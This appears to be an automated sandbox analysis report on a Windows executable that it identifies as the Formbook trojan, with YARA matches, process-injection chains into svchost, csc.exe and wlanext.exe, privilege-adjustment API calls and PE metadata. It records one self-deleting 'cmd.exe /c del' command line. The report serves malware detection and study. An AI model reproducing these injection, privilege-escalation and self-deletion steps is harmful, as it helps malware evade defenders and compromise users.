Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2191048939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.4578868311.000000000E24E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2191367276.0000000004B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Iifpj4i2kC.exe PID: 6924, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6880, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 4340, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: wlanext.exe PID: 6432, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: Iifpj4i2kC.exe

Static PE information: Section: .rsrc ZLIB complexity 0.9952111881684492

Source: classification engine

Classification label: mal100.troj.evad.winEXE@13/0@13/2

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA51830 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,		0_2_00007FF67FA51830
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00FD3355 memset,GetCurrentProcess,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,		7_2_00FD3355

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Iifpj4i2kC.exe	ReversingLabs: Detection: 55%
Source: Iifpj4i2kC.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe

File read: C:\Users\user\Desktop\Iifpj4i2kC.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Iifpj4i2kC.exe "C:\Users\user\Desktop\Iifpj4i2kC.exe"
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: Iifpj4i2kC.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Iifpj4i2kC.exe

Static file information: File size 1627744 > 1048576

Source: Iifpj4i2kC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Iifpj4i2kC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Iifpj4i2kC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Iifpj4i2kC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Iifpj4i2kC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Iifpj4i2kC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Iifpj4i2kC.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Iifpj4i2kC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000005.00000002.2191848573.0000000005590000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000002.2191848573.000000000572E000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2123426388.0000000005009000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000005.00000003.2130282341.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000003.2193080351.0000000003553000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.0000000003700000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000007.00000003.2191313736.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562530449.000000000389E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wlanext.pdb source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: csc.pdb source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: wlanext.pdbGCTL source: csc.exe, 00000005.00000002.2191462232.0000000004BE0000.00000040.10000000.00040000.00000000.sdmp, csc.exe, 00000005.00000002.2191684183.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4561621241.0000000000FD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: csc.pdbF source: explorer.exe, 00000006.00000002.4579757546.000000000FFFF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000007.00000002.4562082880.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000007.00000002.4563248125.0000000003CEF000.00000004.10000000.00040000.00000000.sdmp

Source: Iifpj4i2kC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Iifpj4i2kC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Iifpj4i2kC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Iifpj4i2kC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Iifpj4i2kC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"			Jump to behavior

Source: Iifpj4i2kC.exe	Static PE information: section name: .managed
Source: Iifpj4i2kC.exe	Static PE information: section name: hydrated

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00417968 pushfd ; retf	5_2_0041796A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_004191A3 push di; retf	5_2_004191A6
